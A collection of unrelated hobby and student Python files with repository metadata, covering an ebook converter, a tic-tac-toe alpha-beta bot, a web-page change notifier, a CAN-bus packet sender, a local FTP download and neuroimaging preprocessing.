016a5f87f4b29640756495ae3e9ae123ab27465b
|
/siraj/myclassifier.py
|
0b965912519cfba6cb5833d57d6589d99fe976a9
|
[] |
no_license
|
fazejohk/ImPy
|
8bc6e4b9ab824763cd77e59c6ae7968ec077f178
|
c3d6be535b629226c525a2553736ea2a6ff69487
|
refs/heads/master
| 2021-04-30T13:02:16.873382
| 2018-03-20T15:13:13
| 2018-03-20T15:13:13
| 121,287,320
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,889
|
py
|
import wikipedia
from sklearn.feature_extraction.text import CountVectorizer
from sklearn import tree
x = 0
y = 0
words = []
whatisit = []
vectorizer = CountVectorizer()
decision = tree.DecisionTreeClassifier()
# So this is what is happening:
# I'm opening a word list called SkullSecurityComp
# and searching the terms inside the word list from Wikipedia
# if it finds something it will return true and else it will return false
with open("/home/me/Downloads/SkullSecurityComp") as f:
for line in f:
try:
if wikipedia.summary(line, sentences=1):
print "True"
lenght = len(line) - 2
words.append(line[0:lenght])
whatisit.append("Good")
x += 1
except KeyboardInterrupt:
count = x + y
print "\nTrue:" + str(x)
print "False:" + str(y)
print "Scanned:" + str(count)
""""
print "Words:" + str(words)
print "What is it:" + str(whatisit)
"""
vectorizer.fit(words)
vector = vectorizer.transform(words)
"""
print "Shape"
print vector.shape
print "Type"
print type(vector)
print "Toarray"
print vector.toarray()
"""
decision.fit(vector.toarray(), whatisit)
userinput = ""
while userinput != 'q':
userinput = raw_input("Search:\n")
text = [str(userinput)]
vector2 = vectorizer.transform(text)
prediction = decision.predict(vector2.toarray())
print prediction
exit(0)
except:
print "False"
lenght = len(line) - 2
words.append(line[0:lenght])
whatisit.append("Bad")
y += 1
|
[
"johkmr@gmail.com"
] |
johkmr@gmail.com
|
a0244f7a50d5afebf201e351a8c8342132e79e9b
|
fa6f374fcdb892e35c8041db136f5c16abf2043a
|
/tomswift2pml.py
|
00a7fbd4002ebed3da78a97231e770c3da5b875d
|
[] |
no_license
|
mgatto/tomswift2pml.py
|
0943b0f27fa9b8f072304bab093201d1cf111a0a
|
f84e1678bd244a807c23540ffb3aad0b95687fa0
|
refs/heads/master
| 2022-11-05T02:07:33.004792
| 2020-06-15T00:22:05
| 2020-06-15T00:22:05
| 272,305,827
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,576
|
py
|
import linecache
"""
replace -- with \a150\a150
"""
# lifted from a stackoverflow snippet and modified by me.
def int_to_roman(input):
""" Convert an integer to a Roman numeral. """
if not isinstance(input, type(1)):
raise TypeError(f"expected integer, got {type(input)}")
if not 0 < input < 4000:
raise ValueError("Argument must be between 1 and 3999")
ints = (1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1)
nums = ('M', 'CM', 'D', 'CD','C', 'XC','L','XL','X','IX','V','IV','I')
result = []
for i in range(len(ints)):
count = int(input / ints[i])
result.append(nums[i] * count)
input -= ints[i] * count
return ''.join(result)
def gutenberg2pml(in_file, out_file):
out_file = "Tom_Swift_and_His_Airship.pml"
ow = open(out_file, "w")
book_title = linecache.getline(in_file, 1).split("Title: ")[1].rstrip('\n')
year = linecache.getline(in_file, 2).split("Copyright: ")[1].rstrip('\n')
print(f"""\\v
TITLE="{book_title}"
AUTHOR="Victor Appleton"
PUBLISHER="Grosset & Dunlap"
COPYRIGHT="{year}"
EISBN=""
\\v
\\m="cover.png"
\p
\\c\\l\\B{book_title}\\B\\l
\\sBy Victor Appleton\s
\\c
\\w="100%"
\\c\\s\\i {year} \\i\\s
\\c\\n""", file=ow)
with open(in_file, 'r') as fp:
# start at 4 to skip over the metadata lines
paragraph = []
for line_no, line in enumerate(fp, start=1):
# print(line_no, line)
"""
can skip with this, too:
----
from itertools import islice
lines = list("abcdefghij")
lit = iter(enumerate(lines))
for iline, line in lit:
print(iline, line)
if line == "c":
# skip 3
next(islice(lit, 3,3), None)
"""
if line.startswith("Title:") or line.startswith("Copyright:"):
continue
if line.startswith("Chapter"):
# format the chapter title
chapter_number = line.split("Chapter ")[1].rstrip("\n")
# title is 2 lines ahead of this one
chapter_title = linecache.getline(in_file, line_no + 2).rstrip("\n")
# print(f"chapter line no={line_no} & chapter name={line_no + 2}: {chapter_title}")
print(f"""\\x
\\c\\B\\l Chapter {int_to_roman(int(chapter_number))}: \\l\\B
\\l\\u{chapter_title}\\l\\u
\\c
\\x\\n""", file=ow)
else:
if not line.isspace() and line.rstrip('\n') != chapter_title:
paragraph.append(line.rstrip('\n'))
"""
# this causes the last paragraph to never print because there is no blank line after it...
the source file must be terminated with two blank lines, i.e. a full line whose only content is "\n"
"""
if line.isspace():
# a blank line delimits paragraphs
joined_paragraph = f"{' '.join(paragraph)}\n"
if not joined_paragraph.isspace():
print(joined_paragraph, file=ow)
# TODO make a paragraph counter?
paragraph.clear()
fp.close()
print("""
\w="30%"
\c\BTHE END\B
\c
""", file=ow)
ow.close()
if "__name__" == "__main__":
in_file = input("Enter text file name")
# TODO check for txt?
out_file = f"{in_file.split('.')[0]}.pml"
gutenberg2pml(in_file, out_file)
|
[
"mgatto@vinsuite.com"
] |
mgatto@vinsuite.com
|
d18b5dee90a502b1f960247c1c55f66caee5a74c
|
b9433e893746e35f31e61a349b4f07e51aca822f
|
/ftp/down.py
|
874de8cc6564d14ddfe98f08785fb404fb9b1b71
|
[] |
no_license
|
adadeeeh/progjar
|
71a689bb510c1bdedf357d2ddd77d58c67a017f5
|
d6f85bf22d2acfae0867a61052eca28cbafa2ad1
|
refs/heads/master
| 2021-07-15T08:15:37.588593
| 2017-10-23T07:19:39
| 2017-10-23T07:19:39
| 105,483,602
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
from ftplib import FTP
f = FTP('127.0.0.1')
f.login('Hana', 'tes')
fd = open('grafkom.pdf', 'wb')
f.retrbinary('RETR grafkom.pdf', fd.write)
fd.close()
f.quit()
|
[
"faturrahmanmakruf@gmail.com"
] |
faturrahmanmakruf@gmail.com
|
ff577b243a30e6d8ed9bf166b5dc4666b2766396
|
f6cba93e1fd4907ab0ac2dbabfebc174db1d199f
|
/final_project/game_class.py
|
f8d78f7ab7095dca239c1eeecc3be6b33c1fd0aa
|
[] |
no_license
|
muqizou/242_final_lol
|
a3a0e01f9c064ef34a9421a6b3bcbf7474a15f96
|
25a58e301e3dbb2a0d29c487f00dbdcf6f887ce2
|
refs/heads/master
| 2021-01-10T06:53:59.422713
| 2016-02-19T05:39:34
| 2016-02-19T05:39:34
| 52,055,365
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,261
|
py
|
import roles
from roles import roles
class game_class:
def __init__(self,blueside,purpleside,win):
self.blueside=blueside
self.purpleside=purpleside
self.win=win
def tell_result(self):
return self.win
def find_num(self,nums):
for i in range(0,5):
if nums[0] == self.blueside.herocode[i]:
for j in range(0,5):
if nums[1] == self.purpleside.herocode[j]:
if self.win == "blue":
return "win"
else:
return "lose"
else:
pass
else:
pass
for i in range(0,5):
if nums[1] == self.blueside.herocode[i]:
for j in range(0,5):
if nums[0] == self.purpleside.herocode[j]:
return "purple"
else:
pass
else:
pass
return "NA"
def print_info(self):
self.blueside.print_info()
self.purpleside.print_info()
print self.win
|
[
"muqizou2@illinois.edu"
] |
muqizou2@illinois.edu
|
80ef6c1589b3dc81546f05c175f25444c4f3844d
|
26d04fb000bdd882120109c5aec82c26fb1d9cdb
|
/interface/canibal/CANibal.py
|
5bf3642d4240954a53ae2e615c8ed896a971d020
|
[] |
no_license
|
blomqvist/thesis
|
445ae2dafebd2c2361ec28f9a9c1e55b1f20a4d7
|
532d0e47a18c05cf643a5898c6f92020d2f7e6d0
|
refs/heads/master
| 2020-05-17T04:22:37.097397
| 2016-01-28T18:21:40
| 2016-01-28T18:21:40
| 30,926,038
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,117
|
py
|
import subprocess
import os
class CANibal:
count = 0
FNULL = open(os.devnull, 'w')
''' ICH DEFINES '''
ICH_NODE_ID = 0x17
ICH_PDO_MISO1 = (0x200 + ICH_NODE_ID)
''' ACT DEFINES '''
ACT_NODE_ID = 0x0B
ACT_PDO_MOSI1 = (0x200 + ACT_NODE_ID)
ACT_PDO_MISO1 = (0x180 + ACT_NODE_ID)
ACT_PDO_MISO2 = (0x280 + ACT_NODE_ID)
ACT_PDO_MISO3 = (0x380 + ACT_NODE_ID)
''' EPS DEFINES '''
EPS_NODE_ID = 0x07
EPS_PDO_MOSI1 = (0x200 + EPS_NODE_ID)
''' OCU DEFINES '''
OCU_NODE_ID = 0x1B
OCU_PDOrx1 = (0x200 + OCU_NODE_ID) # Data from MCU: Bfly, AdLift, Buttons
OCU_PDOtx1 = (0x180 + OCU_NODE_ID) # Data from OCU: Command, Speed, Steer, etc
OCU_PDOtx2 = (0x280 + OCU_NODE_ID) # Data from OCU: Display text + LED
''' DEBUG DEFINES '''
DBG_PDO_1 = 0x665
data = [0, 0, 0, 0, 0, 0, 0, 0]
def send_packet(self, COBID):
data = list(map(str, self.data)) # Convert int -> str
subprocess.call(
['./cdump',
str(COBID),
data[0],
data[1],
data[2],
data[3],
data[4],
data[5],
data[6],
data[7]],
stdout = self.FNULL)
|
[
"niklas.blomqvist@gmail.com"
] |
niklas.blomqvist@gmail.com
|
5b79656e0e0548dcf89cf0e97aeba438f35d2ddc
|
916f8962b18272b62fdccd5b2d9ec4b2b2d4d533
|
/prelim/nuisance_matrix.py
|
c2c48eb0b9d1865b09a5941cfa329243871012da
|
[] |
no_license
|
fahaxiki1234/ThalamoCortical_YBK
|
284b84f67fdcc525e3b0c65cc13f0068463fce5d
|
63fee7dea60ba94d04ef9f55cd2b220bb63836a6
|
refs/heads/master
| 2023-03-16T04:22:02.865421
| 2020-05-22T04:21:46
| 2020-05-22T04:21:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,421
|
py
|
#!usr/bin/python
import os
import numpy as np
for subject in os.listdir(os.getcwd()):
if subject.startswith(('C','F','N')):
matrices = 'CSF_noise.txt', 'WM_noise.txt', 'mn.txt'
for matrix in matrices:
if matrix.startswith(('C', 'W')):
nuisance_path = '{subject}/nuisance'.format(subject=subject)
pre = np.loadtxt('{subject}/nuisance/{matrix}'.format(subject=subject, matrix=matrix)
# demean = pre - pre.mean() ### NEED TO REDO (to do spearately for each column)
np.savetxt(os.path.join(nuisance_path, 'demeaned_{matrix}').format(matrix=matrix), demean)
nuisance_contrast = np.asmatrix('1 0')
np.savetxt(os.path.join(nuisance_path, 'contrast.txt'), nuisance_contrast)
if matrix.startswith('m'):
mn_path = '{subject}/motion'.format(subject=subject)
mn = np.loadtxt('{subject}/motion/{matrix}'.format(subject=subject, matrix=matrix))
mn_delete = np.delete(mn, (114,115), 0) ## need (112,113,114,115) if deleteing initial 4 volumes
mn_demean = mn_delete - mn_delete.mean()
np.savetxt(os.path.join(mn_path, 'demeaned_{matrix}').format(matrix=matrix), mn_demean)
mn_contrast = np.asmatrix('1')
np.savetxt(os.path.join(mn_path, 'contrast.txt'), mn_contrast)
|
[
"noreply@github.com"
] |
fahaxiki1234.noreply@github.com
|
e58b04d39ba07e1e3dc874d35c7451fae4675d0d
|
de11f3f8b11e48c17aaf8fc8e73a9514683ee783
|
/main.py
|
4d8847a5d7a4fee0a8206bdf85999b3da1de4559
|
[] |
no_license
|
Yz4230/watch_uec
|
c57ab6cd87eabbe2f0b714143ef80303cf3ad131
|
e6a905d68e8c963a5a8bc8e5c1b44406b1c3560d
|
refs/heads/master
| 2023-04-16T19:50:44.707347
| 2021-04-28T02:27:34
| 2021-04-28T02:27:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,525
|
py
|
import re
import json
import os
import requests
import discord
from typing import Optional
from pprint import pprint
from difflib import unified_diff
from datetime import datetime
from bs4 import BeautifulSoup
from dotenv import load_dotenv
load_dotenv('.env')
DISCORD_WEBHOOK_URL = os.environ.get('DISCORD_WEBHOOK_URL')
HISTORY_JSON_PATH = './history.json'
WATCH_TARGET_URL = 'https://www.uec.ac.jp/students/urgent_info/index.html'
DISCORD_MESSAGE_URL = '''\
ページが更新されました。更新内容は次の通りです。
```diff
{diff}
```
ページのURLはこちらです。\
'''
def get_iso_time() -> str:
return datetime.now().astimezone().isoformat()
def load_history() -> Optional[dict]:
try:
with open(HISTORY_JSON_PATH) as rf:
return json.load(rf)
except FileNotFoundError:
return None
def save_history(history_content: str) -> None:
with open(HISTORY_JSON_PATH, mode='w') as wf:
json.dump({
'content': history_content,
'savedAt': get_iso_time()
}, wf, ensure_ascii=False, indent=2)
def fetch_current_website_content() -> str:
res = requests.get(WATCH_TARGET_URL)
soup = BeautifulSoup(res.text, 'html.parser')
text = soup.select_one('#primary').text
text = re.sub(r'\n+', '\n', text)
text = '\n'.join(map(lambda s: s.strip(), text.split()))
return text
def compute_unified_diff(a: str, b: str) -> str:
diff = unified_diff(a.split('\n'), b.split('\n'), n=2)
return '\n'.join(diff)
def post_discord_message(message_content: str) -> None:
requests.post(DISCORD_WEBHOOK_URL, json={
'content': message_content,
'embeds': [{
'title': '新型コロナウイルスに係る在学生へのお知らせ│電気通信大学',
'url': 'https://www.uec.ac.jp/students/urgent_info/index.html',
'image': {
'url': 'https://www.uec.ac.jp/images_new/mv/mv_corona_sp.jpg'
}
}]
})
current_website_content = fetch_current_website_content()
last_website_content = history['content'] if (
history := load_history()) else None
if last_website_content is None:
save_history(current_website_content)
elif current_website_content != last_website_content:
save_history(current_website_content)
diff = compute_unified_diff(last_website_content, current_website_content)
discord_message_content = DISCORD_MESSAGE_URL.format(diff=diff)
post_discord_message(discord_message_content)
|
[
"yuzupon1480@gmail.com"
] |
yuzupon1480@gmail.com
|
a4ddc00e2cfe0b4082f7f3aa943524d7b959c566
|
55fea66b55b669838b933b5182f819067bc85e0c
|
/src/LoginController.py
|
39e6c97a4e5032bebfb66d3bafe483e23b025ffc
|
[] |
no_license
|
jalacardio/LolAnaly
|
334f6bf008d43411658baf3e7bfe9a62700d581b
|
09da0520b6d55aa079bb8d836386c82a20dc2f78
|
refs/heads/master
| 2021-09-02T08:57:14.564969
| 2018-01-01T08:17:19
| 2018-01-01T08:17:19
| 115,587,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 181
|
py
|
class LoginController:
def __init__(self):
print("Login controller created")
def login(self, app):
usr = app.getEntry("UserID")
print("User: ", usr)
|
[
"noreply@github.com"
] |
jalacardio.noreply@github.com
|
673017b4758bc4dcd16835c0e1a246dda28b7ba3
|
906c2d43c010b0435c8254246e92505ae350af93
|
/AI/team29.py
|
3582e2f0ec0e112bb7e20f04609030a44879b15e
|
[] |
no_license
|
surendra1233/sem-4
|
5ba25225179767c102f219cdb8bc8b63ca150214
|
3f9fe0d0761fcb3ca847d36fd61fad3f9e4a6795
|
refs/heads/master
| 2022-07-20T01:44:41.526805
| 2019-06-17T15:21:23
| 2019-06-17T15:21:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,730
|
py
|
# from simulator import copy
import copy,time
class Team29:
def __init__(self):
self.blocks = {}
self.player = "x"
self.opponent = "o"
self.count = 0
self.start = time.time()
def find_valid_move_cells(self, old_move,small_boards_status,big_boards_status):
#returns the valid cells allowed given the last move and the current board state
allowed_cells = []
allowed_small_board = [old_move[1]%3, old_move[2]%3]
#checks if the move is a free move or not based on the rules
if old_move == (-1,-1,-1) or (small_boards_status[0][allowed_small_board[0]][allowed_small_board[1]] != '-' and small_boards_status[1][allowed_small_board[0]][allowed_small_board[1]] != '-'):
for k in range(2):
for i in range(9):
for j in range(9):
if big_boards_status[k][i][j] == '-' and small_boards_status[k][i/3][j/3] == '-':
allowed_cells.append((k,i,j))
else:
for k in range(2):
if small_boards_status[k][allowed_small_board[0]][allowed_small_board[1]] == "-":
for i in range(3*allowed_small_board[0], 3*allowed_small_board[0]+3):
for j in range(3*allowed_small_board[1], 3*allowed_small_board[1]+3):
if big_boards_status[k][i][j] == '-':
allowed_cells.append((k,i,j))
return allowed_cells
def check_valid_move(self, old_move, new_move,small_boards_status,big_boards_status):
#checks if a move is valid or not given the last move
if (len(old_move) != 3) or (len(new_move) != 3):
return False
for i in range(3):
if (type(old_move[i]) is not int) or (type(new_move[i]) is not int):
return False
if (old_move != (-1,-1,-1)) and (old_move[0] < 0 or old_move[0] > 1 or old_move[1] < 0 or old_move[1] > 8 or old_move[2] < 0 or old_move[2] > 8):
return False
cells = self.find_valid_move_cells(old_move,small_boards_status,big_boards_status)
return new_move in cells
def update(self, old_move, new_move, ply,small_boards_status,big_boards_status):
#updating the game board and small_board status as per the move that has been passed in the arguements
if(self.check_valid_move(old_move, new_move,small_boards_status,big_boards_status)) == False:
return 'UNSUCCESSFUL', False
big_boards_status[new_move[0]][new_move[1]][new_move[2]] = ply
x = new_move[1]/3
y = new_move[2]/3
k = new_move[0]
#checking if a small_board has been won or drawn or not after the current move
bs = big_boards_status[k]
for i in range(3):
#checking for horizontal pattern(i'th row)
if (bs[3*x+i][3*y] == bs[3*x+i][3*y+1] == bs[3*x+i][3*y+2]) and (bs[3*x+i][3*y] == ply):
small_boards_status[k][x][y] = ply
return 'SUCCESSFUL', True
#checking for vertical pattern(i'th column)
if (bs[3*x][3*y+i] == bs[3*x+1][3*y+i] == bs[3*x+2][3*y+i]) and (bs[3*x][3*y+i] == ply):
small_boards_status[k][x][y] = ply
return 'SUCCESSFUL', True
#checking for diagonal patterns
#diagonal 1
if (bs[3*x][3*y] == bs[3*x+1][3*y+1] == bs[3*x+2][3*y+2]) and (bs[3*x][3*y] == ply):
small_boards_status[k][x][y] = ply
return 'SUCCESSFUL', True
#diagonal 2
if (bs[3*x][3*y+2] == bs[3*x+1][3*y+1] == bs[3*x+2][3*y]) and (bs[3*x][3*y+2] == ply):
small_boards_status[k][x][y] = ply
return 'SUCCESSFUL', True
#checking if a small_board has any more cells left or has it been drawn
for i in range(3):
for j in range(3):
if bs[3*x+i][3*y+j] =='-':
return 'SUCCESSFUL', False
small_boards_status[k][x][y] = 'd'
return 'SUCCESSFUL', False
def block_status(self,block):
for i in range(3):
if block[i][0]==block[i][1]==block[i][2] and block[i][1] != "-":
return block[i][0]
if block[0][i] == block[1][i] == block[2][i] and block[1][i] != "-":
return block[0][i]
if block[0][0]==block[1][1]==block[2][2] and block[0][0] !="-":
return block[0][0]
if block[0][2]==block[1][1]==block[2][0] and block[1][1] !="-":
return block[1][1]
for i in range(3):
for j in range(3):
if block[i][j]=='-':
return "-"
return "d"
def find_terminal_state(self,small_boards_status):
#checks if the game is over(won or drawn) and returns the player who have won the game or the player who has higher small_boards in case of a draw
cntx = 0
cnto = 0
cntd = 0
for k in range(2):
bs = small_boards_status[k]
for i in range(3):
for j in range(3):
if bs[i][j] == 'x':
cntx += 1
if bs[i][j] == 'o':
cnto += 1
if bs[i][j] == 'd':
cntd += 1
for i in range(3):
row = bs[i]
col = [x[i] for x in bs]
#print row,col
#checking if i'th row or i'th column has been won or not
if (row[0] =='x' or row[0] == 'o') and (row.count(row[0]) == 3):
return (row[0],'WON')
if (col[0] =='x' or col[0] == 'o') and (col.count(col[0]) == 3):
return (col[0],'WON')
#check diagonals
if(bs[0][0] == bs[1][1] == bs[2][2]) and (bs[0][0] == 'x' or bs[0][0] == 'o'):
return (bs[0][0],'WON')
if(bs[0][2] == bs[1][1] == bs[2][0]) and (bs[0][2] == 'x' or bs[0][2] == 'o'):
return (bs[0][2],'WON')
if cntx+cnto+cntd < 18: #if all small_boards have not yet been won, continue
return ('CONTINUE', '-')
elif cntx+cnto+cntd == 18: #if game is drawn
return ('NONE', 'DRAW')
def checkAllowedMoves(self,block):
allowed=[]
for i in range(3):
for j in range(3):
if block[i][j] == "-":
allowed.append((i, j))
return allowed
def block_score(self,block):
block = tuple([tuple(block[i]) for i in range(3)])
moves = []
if block not in self.blocks:
stat = self.block_status(block)
if stat == self.player:
self.blocks[block] = 1
elif stat == self.opponent:
self.blocks[block] = 0
elif stat == "d":
self.blocks[block] = 0.2
else:
moves = self.checkAllowedMoves(block)
#we play the next move
our_scores = []
playBlock = [list(block[i]) for i in range(3)]
for move in moves:
playBlock[move[0]][move[1]] = self.player
our_scores.append(self.block_score(playBlock))
playBlock[move[0]][move[1]] = "-"
#opponent plays the next move
op_scores = []
for move in moves:
playBlock[move[0]][move[1]] = self.opponent
op_scores.append(self.block_score(playBlock))
playBlock[move[0]][move[1]] = "-"
self.blocks[block] = 0.5*(max(our_scores)+min(op_scores))
return self.blocks[block]
def board_score(self,small_boards_status,big_boards_status,flag):
scores = [[],[]]
op_scores = [[],[]]
cntx = 0
cnto = 0
cntd = 0
for k in range(2):
bs = small_boards_status[k]
for i in range(3):
for j in range(3):
if bs[i][j] == 'x':
cntx += 1
if bs[i][j] == 'o':
cnto += 1
if bs[i][j] == 'd':
cntd += 1
if cntx+cnto+cntd == 18: #if game is drawn
return 50
for k in range(2):
for i in range(3):
for j in range(3):
temp = [[big_boards_status[k][i*3+r][j*3+c] for r in range(3)]for c in range(3)]
#score for each block
scores[k].append(self.block_score(temp))
for k in range(2):
for i in range(3):
for j in range(3):
temp = [[0 for r in range(3)]for c in range(3)]
for r in range(3):
for c in range(3):
if big_boards_status[k][i*3+r][j*3+c]==self.player:
temp[r][c] = self.opponent
elif big_boards_status[k][i*3+r][j*3+c]==self.opponent:
temp[r][c] = self.player
else:
temp[r][c] = "-"
op_scores[k].append(self.block_score(temp))
#get line scores
lines = [[],[]]
op_lines = [[],[]]
for k in range(2):
for i in range(3):
lines[k].append(scores[k][3*i]*scores[k][3*i+1]*scores[k][3*i+2])
op_lines[k].append(op_scores[k][3*i]*op_scores[k][3*i+1]*op_scores[k][3*i+2])
lines[k].append(scores[k][i]*scores[k][i+3]*scores[k][i+6])
op_lines[k].append(op_scores[k][i]*op_scores[k][i+3]*op_scores[k][i+6])
lines[k].append(scores[k][0]*scores[k][4]*scores[k][8])
op_lines[k].append(op_scores[k][0]*op_scores[k][4]*op_scores[k][8])
lines[k].append(scores[k][2]*scores[k][4]*scores[k][6])
op_lines[k].append(op_scores[k][2]*op_scores[k][4]*op_scores[k][6])
#return sum of the scores of lines
if 1 in lines[0]:
return 100
elif 1 in lines[1]:
return 100
elif 1 in op_lines[0]:
return -100
elif 1 in op_lines[1]:
return -100
else:
# if flag==self.player:
return max(sum(lines[0])-sum(op_lines[0]),sum(lines[1])-sum(op_lines[1]))
# else:
# return min(sum(lines[0])-sum(op_lines[0]),sum(lines[1])-sum(op_lines[1]))
def move(self, board, old_move, flag):
self.start = time.time()
if self.count==0 and flag != self.player:
self.opponent = "x"
self.player = "o"
depth = 4
elif self.count==0:
depth = 4
elif self.count<=30:
depth = 4
elif self.count<=60:
depth = 4
elif self.count<=70:
depth = 4
else:
depth = 5
# else:
# depth = 4
if self.count==0 and flag=="x":
self.count+=1
t = [["-","-","-"],["-","-","-"],["-","-","-"]]
a = self.block_score(t)
return (0,4,4)
big_boards_status = copy.deepcopy(board.big_boards_status)
small_boards_status = copy.deepcopy(board.small_boards_status)
if big_boards_status[old_move[0]][old_move[1]][old_move[2]] == self.player:
score,next_move= self.alphabetapruning(small_boards_status,big_boards_status,depth,old_move, -100000000, 100000000,flag,True)
else:
score,next_move= self.alphabetapruning(small_boards_status,big_boards_status,depth,old_move, -100000000, 100000000,flag,False)
self.count+=1
# print next_move,score, flag, depth
return next_move
def alphabetapruning(self,small_boards_status,big_boards_status,depth,old_move,alpha,beta,flag,bonus):
stat = self.find_terminal_state(small_boards_status)
if stat[0] == self.player:
return 100,()
elif stat[0] == self.opponent:
return -100,()
elif stat[1] == "DRAW":
return 50,()
max_player = False
if flag==self.player:
max_player = True
# temp = BigBoard()
temp_big_boards_status = copy.deepcopy(big_boards_status)
temp_small_boards_status = copy.deepcopy(small_boards_status)
moves = self.find_valid_move_cells(old_move,small_boards_status,big_boards_status)
# random.shuffle(moves)
move_scores = []
siz = len(moves)
if siz > 18 and self.count<=60:
depth -= 1
i = 0
if depth > 0 and time.time()-self.start<=22:
for m in moves:
self.update(old_move,m,flag,temp_small_boards_status,temp_big_boards_status)
move_scores.append((self.board_score(temp_small_boards_status,temp_big_boards_status,flag),i))
temp_big_boards_status[m[0]][m[1]][m[2]] = "-"
temp_small_boards_status[m[0]][m[1]/3][m[2]/3] = "-"
i+=1
#sort them in decreasing order
sorted(move_scores,key=lambda x: x[0], reverse=max_player)
bestmove = ()
# print moves
if depth>1 and time.time()-self.start<=22:
for i in range(siz):
self.update(old_move,moves[move_scores[i][1]],flag,temp_small_boards_status,temp_big_boards_status)
if max_player:
if temp_small_boards_status[moves[move_scores[i][1]][0]][moves[move_scores[i][1]][1]/3][moves[move_scores[i][1]][2]/3] == self.player and bonus == False:
s,m = self.alphabetapruning(temp_small_boards_status,temp_big_boards_status,depth-1,moves[move_scores[i][1]],alpha,beta,self.player,True)
# if s < beta:
# beta = s
# bestmove = moves[move_scores[i][1]]
# if alpha >= beta:
# break
else:
s,m = self.alphabetapruning(temp_small_boards_status,temp_big_boards_status,depth-1,moves[move_scores[i][1]],alpha,beta,self.opponent,False)
if s > alpha:
alpha = s
bestmove = moves[move_scores[i][1]]
if alpha >= beta:
break
if time.time()-self.start>22:
return move_scores[0][0],moves[move_scores[0][1]]
else:
if temp_small_boards_status[moves[move_scores[i][1]][0]][moves[move_scores[i][1]][1]/3][moves[move_scores[i][1]][2]/3] == self.opponent and bonus == False:
s,m = self.alphabetapruning(temp_small_boards_status,temp_big_boards_status,depth-1,moves[move_scores[i][1]],alpha,beta,self.opponent,True)
# if s > alpha:
# alpha = s
# bestmove = moves[move_scores[i][1]]
# if alpha >= beta:
# break
else:
s,m = self.alphabetapruning(temp_small_boards_status,temp_big_boards_status,depth-1,moves[move_scores[i][1]],alpha,beta,self.player,False)
if s < beta:
beta = s
bestmove = moves[move_scores[i][1]]
if alpha >= beta:
break
if time.time()-self.start>22:
return move_scores[0][0],moves[move_scores[0][1]]
temp_small_boards_status[moves[move_scores[i][1]][0]][moves[move_scores[i][1]][1]/3][moves[move_scores[i][1]][2]/3] = "-"
temp_big_boards_status[moves[move_scores[i][1]][0]][moves[move_scores[i][1]][1]][moves[move_scores[i][1]][2]] = "-"
elif depth > 0 and time.time()-self.start<=22:
return move_scores[0][0],moves[move_scores[0][1]]
else:
return self.board_score(small_boards_status,big_boards_status,flag),bestmove
# if depth==5:
# print move_scores
if max_player:
return alpha,bestmove
else:
return beta,bestmove
|
[
"gopireddysurendrakumarreddy@gmail.com"
] |
gopireddysurendrakumarreddy@gmail.com
|
b1fedd640e6e1d56b61220de47933530cc15c3d4
|
a6a3f9b829c89bf0865902e41d23c801578e1aa2
|
/manage.py
|
b7887d01c45c48f3164b8b438dc6b8f2e53f0747
|
[] |
no_license
|
Ajithsingh26/celery-python
|
2b361cfc6b46aa60d2b56723f1880ee480c93b6e
|
56055fd29ac694fe570f6340940db385326a4a74
|
refs/heads/master
| 2023-07-07T21:01:49.038366
| 2021-08-04T18:08:41
| 2021-08-04T18:08:41
| 392,785,845
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mail_celery.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"aj@localhost.localdomain"
] |
aj@localhost.localdomain
|
03bd9e1cbe334ce7f9d854894bb3a88f503970be
|
d163ba3eaec7130e57e0e3e32814f27b38137f4f
|
/Utils/preprocessing/resize.py
|
2234ee977c76fd23c6c7a7edb027346aae21e922
|
[] |
no_license
|
zerebom/0513_make_disparity_picture_withCNN
|
e874864c2cf97fe75b5db73474b1b1b5f7f3d0c1
|
6569c59047caf80a72c7a174a3a96873de6311d2
|
refs/heads/master
| 2020-05-22T12:54:30.142109
| 2019-05-22T05:44:32
| 2019-05-22T05:44:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,685
|
py
|
#slide画像用に、path_changesより低機能のコードを作成
import glob
import os
import re
from PIL import Image
from tensorflow.python.keras.preprocessing.image import load_img, img_to_array, array_to_img, ImageDataGenerator
import numpy as np
def path_changes(picture_names, parent_dic, child_dic, original_pic_paths, init_size=(1024, 1110)):
#画像の種類ごとにpathを取得する(左目disp->右目disp->...)
for path, pic_name in zip(original_pic_paths, picture_names):
image = Image.open(path)
if init_size:
#disparitymapのみに使用↓
image = image.resize(init_size)
#親ディレクトリ/画像種類別ディレクトリ/画像名.png
os.makedirs(child_dic, exist_ok=True)
image.save( child_dic + r'\\' + pic_name)
if __name__ == "__main__":
L_original_pic_paths=glob.glob(r'C:\Users\icech\Desktop\lab2019\2019_4\Data\slide_dis\Modify\Left_slide\*')
R_original_pic_paths = glob.glob(r'C:\Users\icech\Desktop\lab2019\2019_4\Data\slide_dis\Modify\Right_slide\*')
parent_dic = r'C:\Users\icech\Desktop\lab2019\2019_4\Data\slide_dis\Modify'
picture_names = [re.sub(r'.+\\', '', x) for x in L_original_pic_paths]
child_dic_L=r'C:\Users\icech\Desktop\lab2019\2019_4\Data\slide_dis\Modify\Left_slide2'
child_dic_R=r'C:\Users\icech\Desktop\lab2019\2019_4\Data\slide_dis\Modify\Right_slide2'
path_changes(picture_names, parent_dic, child_dic_L, L_original_pic_paths, init_size=(1024, 1110))
